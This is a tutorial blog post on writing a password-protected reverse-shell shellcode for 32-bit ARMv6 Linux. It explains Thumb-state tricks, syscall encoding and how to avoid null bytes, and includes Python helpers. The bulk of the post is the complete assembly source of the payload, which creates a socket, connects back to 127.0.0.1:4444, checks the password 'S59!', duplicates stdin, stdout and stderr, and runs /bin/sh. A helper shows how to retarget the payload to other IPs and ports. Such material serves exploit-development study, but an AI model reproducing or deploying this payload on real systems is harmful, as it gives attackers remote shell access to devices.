After having written a similar payload for Linux/Intel x64, I was curious about how to apply this knowledge to other architectures, so I decided to go with ARM since it’s an interesting and widespread one.

About ARM

ARM is a Reduced Instruction Set Computing (RISC) processor architecture that is used everywhere these days: mobile phones, smart thermostats, TVs, Wi-Fi dongles, cars, credit cards, you name it.

How does ARM compare against Intel x86? Here are some key takeaways:

- Since ARM is a RISC architecture, it has a simplified instruction set that is just a fraction of the size of its 32-bit Intel counterpart, x86.
- While on x86 most instructions are allowed to access and operate on memory, on ARM the data must be moved from memory into registers before being operated on. Most ARM instructions operate only on registers. Only Load/Store instructions can access memory.
- ARM has two main instruction set states: ARM and Thumb. Thumb instructions are 2 bytes long most of the time, while in ARM state instructions are always 4 bytes long. For shellcode writing, Thumb state is the de facto choice as it saves space and avoids a lot of null bytes.
- The ARM mov instruction has a limited range of immediate values that can be used directly with the instruction. If a number is out of this range it can’t be used directly and must, therefore, be split into parts and loaded using several operations/values.

How do I switch to Thumb state?

In order to switch to Thumb state, we can make use of the Branch and Exchange instruction (bx) after having set the destination register’s least significant bit to 1. This can be achieved by adding 1 to the Program Counter (the pc register) while in ARM state.

    <some arm code>       // Here we are running in ARM state
    ...
    add r0, pc, #1        // Increase value of PC by 1 and place the result into r0
    bx r0                 // Branch & Exchange to the address in r0
                          // This will make the switch to Thumb state because the LSB of r0 = 1
    <some thumb code>     // From here on we can execute Thumb state instructions!
    ...

From now on all the coding will be done in Thumb state since this is the relevant state for writing shellcode.

Setting up the lab

First of all, we’ll need a lab to run our tests on. Here are some options for it:

1. You can go for the real deal and test the payload on a real Raspberry Pi 1.
2. You can build/run an emulated environment using Qemu. Since I used the armv6_stretch Qemu image from this repo, I’d recommend you use the same setup. It pretty much works off the shelf, don’t worry.
3. You could download and use the VM provided by Azeria Labs.

Writing the payload

Stage One: General Overview

First of all, what are we trying to achieve here? Our goal is to write shellcode for the Linux 32-bit ARMv6 architecture that will connect back to a remote location over TCP/IPv4 and provide a shell only after the remote client provides a valid password.

In order to write the payload, we need to chain several syscalls. The exact order is the following:

1. We create a new socket to manage the new connection.
2. We connect to the target address.
3. We read from the socket and check if the provided password is correct.
4. We duplicate each standard stream into the new connection stream using the dup2 syscall, so the target machine can read and write messages to and from the source machine.
5. We start a shell by using the execve syscall.

Each of these syscalls has a signature we need to respect: certain registers must contain specific values. For example, the r7 register is used to identify the syscall that is executed, so it should always contain the syscall number. A whole document containing a full syscall table can be found here.

Photo credit: Webaroo.com.au

Stage Two: Writing a Syscall

Let’s see an example of how to write a syscall in ARM Thumb state. We’ll use the socket syscall (the first column shows the assembled bytes):

                              // [281] socket(2, 1, 0)
    02 20    mov r0, #2       // loads immediate value 2 into r0
    01 21    mov r1, #1       // loads immediate value 1 into r1
    52 40    eor r2, r2       // zeroes out r2 by xoring it with itself
                              // 281 is out of range for immediate values
                              // It must be loaded in parts
    c8 27    mov r7, #200     // part1: loads immediate value 200 into r7
    51 37    add r7, #81      // part2: adds 81 to r7, giving 281 (the syscall number)
    01 df    svc #1           // issues the syscall

Here you can see:

- The r7 register being used to identify the syscall
- Registers r0, r1, and r2 used as parameters for the syscall
- An example of how to deal with immediate values that are out of range
- The use of the svc instruction to perform a system call

Stage Three: Writing the full payload

Armed with all our knowledge, we are now prepared to chain every syscall and put together our payload.
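Before moving on, the byte pairs shown next to the socket example in Stage Two can be reproduced by hand, which makes it easier to see where null bytes would sneak in. What follows is only a minimal sketch in Python, not part of the original payload or its tooling. It assumes the standard 16-bit Thumb encodings for mov/add with an 8-bit immediate, register eor, and svc, and the helper names (mov_imm, add_imm, eor_reg, svc, assemble) are made up for illustration.

```python
import struct


def _check(reg, imm=0):
    # These 16-bit encodings only reach r0-r7 and an 8-bit immediate.
    if not 0 <= reg <= 7 or not 0 <= imm <= 255:
        raise ValueError("needs a low register (r0-r7) and an immediate in 0..255")


def mov_imm(rd, imm):
    """mov rd, #imm  ->  00100 ddd iiiiiiii"""
    _check(rd, imm)
    return 0x2000 | (rd << 8) | imm


def add_imm(rdn, imm):
    """add rdn, #imm  ->  00110 ddd iiiiiiii"""
    _check(rdn, imm)
    return 0x3000 | (rdn << 8) | imm


def eor_reg(rdn, rm):
    """eor rdn, rm  ->  0100000001 mmm ddd"""
    _check(rdn)
    _check(rm)
    return 0x4040 | (rm << 3) | rdn


def svc(imm):
    """svc #imm  ->  11011111 iiiiiiii"""
    _check(0, imm)
    return 0xDF00 | imm


def assemble(halfwords):
    # Thumb instructions are stored as little-endian 16-bit halfwords.
    return b"".join(struct.pack("<H", h) for h in halfwords)


# [281] socket(2, 1, 0), same instruction sequence as in Stage Two
socket_call = assemble([
    mov_imm(0, 2),
    mov_imm(1, 1),
    eor_reg(2, 2),
    mov_imm(7, 200),
    add_imm(7, 81),
    svc(1),
])

print(socket_call.hex())                 # 022001215240c827513701df
print(b"\x00" in socket_call)            # False
print(b"\x00" in assemble([svc(0)]))     # True
```

Under these assumptions, the sketch also hints at why the listing uses eor r2, r2 and svc #1: mov r2, #0 would assemble to 00 22 and svc #0 to 00 df, both of which contain a null byte. Calling mov_imm(7, 281) raises a ValueError, which is the same limitation that forces the 200 + 81 split.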
The following Gist was extracted from the source code on my main repository:

    // Password-Protected Reverse Shell Linux/ARMv6
    // Author: Alan Vivona
    // medium.syscall59.com
    // @syscall59

    .section .text
    .global _start

    _start:
        .arm
        add r3, pc, #1        // switch to thumb mode
        bx r3

        .thumb
        // [281] socket(2, 1, 0)
        mov r0, #2
        mov r1, #1
        eor r2, r2
        mov r7, #200
        add r7, #81
        svc #1
        mov r10, r0           // save sockfd into r10

        // [283] connect(socketfd, target, addrlen)
        // socket fd is in r0 already
        adr r1, target
        strb r2, [r1, #1]     // replace the 0xff value of the protocol field with a 0x00
        strb r2, [r1, #5]     // replace the 1st '255' value of the IP field with a 0
        strb r2, [r1, #6]     // replace the 2nd '255' value of the IP field with a 0
        mov r2, #16
        add r7, #2            // 281 + 2 = 283
        svc #1

        // [003] read(sourcefd, destbuffer, amount)
        push {r1}
        mov r1, sp
        mov r2, #4
        mov r7, #3

    read_pass:
        mov r0, r10
        svc #1

    check_pass:
        ldr r3, pass
        ldr r4, [r1]
        eor r3, r3, r4
        bne read_pass

        // [063] dup2(sockfd, stdIO)
        mov r1, #2            // r1 = 2 (stderr)
        mov r7, #63           // r7 = 63 (dup2)

    loop_stdio:
        mov r0, r10           // r0 = saved sockfd
        svc #1
        sub r1, #1
        bpl loop_stdio        // loop while r1 >= 0

        // [011] execve(command, 0, 0)
        adr r0, command
        eor r2, r2
        eor r1, r1
        strb r2, [r0, #7]
        mov r7, #11
        svc #1

    // 2 bytes alignment fix if needed (can't use a nop as it has a null byte)
    // align_bytes : .byte 0xff, 0xff

    target:
        // The 0xff will be replaced with a null on runtime
        .ascii "\x02\xff"          // Protocol: IPv4/TCP.
        .ascii "\x11\x5c"          // Port : 4444
        // The '255' will be replaced with a 0 on runtime
        .byte 127, 255, 255, 1     // IP: 127.0.0.1.

    command: .ascii "/bin/sh?"     // The '?' will be replaced with a null on runtime
    pass:    .ascii "S59!"

Testing

When testing the payload, take into consideration that it was crafted for Linux 32-bit ARMv6 (the architecture of the Raspberry Pi 1’s processor). Some tweaks may be needed for it to work on other platforms/architectures.
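If you point the payload at a different IP or port while testing, the bytes under the target label and the strb offsets that patch them have to change together. Here is a minimal Python sketch of that bookkeeping. It is not part of the original source, and the function name sockaddr_placeholder is made up for illustration. It assumes the same layout the payload uses: a little-endian address family, followed by the port and the IPv4 address in network byte order, with every null byte swapped for 0xff.

```python
import socket
import struct


def sockaddr_placeholder(ip, port):
    """Return (bytes to embed under `target`, offsets to zero at runtime)."""
    raw = struct.pack("<H", socket.AF_INET)   # address family, little-endian
    raw += struct.pack(">H", port)            # port, network byte order
    raw += socket.inet_aton(ip)               # IPv4 address, network byte order

    # Every null byte is embedded as 0xff and patched back to 0 at runtime.
    offsets = [i for i, b in enumerate(raw) if b == 0]
    embedded = bytes(0xFF if b == 0 else b for b in raw)
    return embedded, offsets


embedded, offsets = sockaddr_placeholder("127.0.0.1", 4444)
print(embedded.hex())   # 02ff115c7fffff01
print(offsets)          # [1, 5, 6]
```

For 127.0.0.1:4444 this gives back the bytes in the listing and the offsets 1, 5 and 6 used by the three strb instructions. A target with a different set of null bytes would need a matching set of strb lines, one per offset.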
In the following video, you can see the whole process of booting up the Qemu armv6 image, assembling the payload and, finally, the test: https://vimeo.com/331280681

That’s all! Hope you enjoyed this one! The full source code can be found on my GitHub repo and Exploit-DB.

Follow me on Twitter and Medium for more content like this!